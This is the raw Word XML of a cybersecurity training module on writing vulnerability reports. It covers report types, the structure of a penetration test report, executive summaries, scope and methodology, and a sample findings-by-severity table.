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rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>MODULE 18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9DC3E6"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Vulnerability Reporting &amp; Documentation Basics</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 4: Ethical Hacking Foundations  •  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MindGigs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Cybersecurity Training</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458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5"/>
        <w:gridCol w:w="4815"/>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rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>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rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Phase 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Week 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Module Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Finding vulnerabilities is only half the job. The ability to clearly document, communicate, and present security findings is what separates a skilled cybersecurity professional from someone who can merely run tools. This module teaches students how to writ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>e professional vulnerability reports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> the primary deliverable of any security assessment, penetration test, or bug bounty engagement. Students will learn the anatomy of a well-structured vulnerability report, how to assess and communicate risk using indus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>try-standard scoring systems, how to write findings that are actionable for both technical and non-technical audiences, and how to present their work with credibility and clarity. These documentation skills are directly applicable to entry-level SOC analys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>t roles, vulnerability assessment positions, and penetration testing careers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Learning Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>By the end of this module, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Explain the structure and purpose of a professional vulnerability report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Use the CVSS (Common Vulnerabil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ity Scoring System) to calculate and justify vulnerability severity ratings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Write clear, concise, and actionable vulnerability findings for both technical and non-technical readers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Distinguish between different risk levels and communicate their business im</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>pact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Document proof-of-concept evidence responsibly and professionally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Produce a complete vulnerability report from a simulated security assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Apply responsible disclosure principles when reporting vulnerabilities to organizations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Key Concepts &amp; Term</w:t>
      </w:r>
      <w:r>
        <w:t>inology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Why Vulnerability Reporting Matters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">A security assessment that produces no actionable report has limited value. The report is the product. It is what the client, the organization's leadership, and the remediation teams actually receive and act upon. A poorly written report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>even if it identifies critical vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> may result in findings being dismissed, misunderstood, or deprioritized. A well-written report drives real security improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>The Report is the Deliverable</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1" w:rsidP="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Even the most technically brilliant penetration test is worthl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">ess if the findings cannot be understood and acted upon. Reports are read by CISOs, IT managers, developers, compliance officers, and board members </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>audiences with vastly different technical backgrounds. The best security professionals write findings that</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> resonate with all of them: technically precise for engineers, risk-framed for executives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Types of Security Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Different engagements produce different types of reports. Understanding the appropriate format for each context is essential.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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Report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Purpose, Audience &amp; Key Contents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Penetration Test Report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Documents the full methodology, findings, and recommendations from an authorized simulated attack. Audience: CISO, IT leadership, remediation team. Contains: executive summary, scope, methodology, findings with CVSS scores, risk ratings, remediation guidan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>ce, and appendices with raw evidence.</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Vulnerability Assessment Report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 xml:space="preserve">Documents vulnerabilities discovered through scanning tools and manual validation without active exploitation. Less narrative than a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> report. Audience: IT security team. Contains: scan scope, tool outputs, validated findings, severity distribution, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>remediation priorities.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Bug Bounty Report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Submitted to an organization's security team through a bug bounty platform (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>HackerOne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Bugcrowd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>). Must be concise, reproducible, and clearly demonstrate impact. Audience: Vendor security team. Contains: vulnerabil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>ity description, steps to reproduce, proof-of-concept, impact statement, suggested fix.</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Security Audit Report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Evaluates an organization's security posture against a standard or framework (ISO 27001, NIST, PCI-DSS). Audience: Compliance, legal, executive team. Contains: scope, control assessments, gaps, compliance status, risk ratings, remediation roadmap.</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Incident Report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Documents a security incident — what happened, how it was discovered, what was affected, and how it was remediated. Audience: Executive team, legal, regulators. Contains: timeline, impact assessment, root cause, containment steps, lessons l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>earned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Anatomy of a Professional Vulnerability Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A well-structured vulnerability report follows a consistent format that guides readers from a high-level overview down to granular technical details. The structure ensures that both executives and en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>gineers can find what they need without reading the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>1. Cover Page &amp; Report Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The cover page establishes professionalism and provides essential context. It should include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Report title (e.g., 'Penetration Test Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> External Netw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ork Assessment')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Target organization name and assessment scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Assessment dates (start and end of testing window)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Report version and classification (Confidential / Restricted)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Author(s) name, title, and organization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Report date and distribution list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>2. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The executive summary is the most important section of the report — it is often the only section read by senior leadership. It must be written in plain language, avoid technical jargon, and focus on business risk and organizational imp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>act rather than technical details.</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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Executive Summary Must Answer These Questions:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>What was tested and over what period? • What is the overall security posture (positive framing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> what was done well)? • What are the most critical risks identified and their business impact? • What are the top 3–5 priority actions the organization must tak</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>e? • What is the overall risk level (Critical / High / Medium / Low)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>3. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>This section documents exactly what was tested and how. It protects both the assessor and the client by establishing clear boundaries and preventing disputes about out-of-scope findings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>In-Scope: IP ranges, domains, applications, and systems that were tes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Out-of-Scope: Systems explicitly excluded from testing (e.g., production databases, third-party services)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Testing Methodology: Frameworks followed (OWASP Testing Guide, PTES, NIST)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Testing Dates and Times: When active testing occurred (important for lo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>g correlation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Testing Type: Black box (no prior knowledge), grey box (partial knowledge), white box (full access)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Tools Used: List of scanning and exploitation tools used during the assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>4. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A high-level table showing all vulnerabil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ities discovered, organized by severity. Allows readers to understand the full scope of findings at a glance before reading individual details.</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Severity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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Critical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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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High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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Medium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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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lastRenderedPageBreak/>
              <w:t>Low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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Informational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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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Total Findings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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>5. Individual Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The core of the report. Each vulnerability gets its own detailed write-up following a consistent template. This is covered in depth in the next section.</w:t>
      </w:r>
    </w:p>
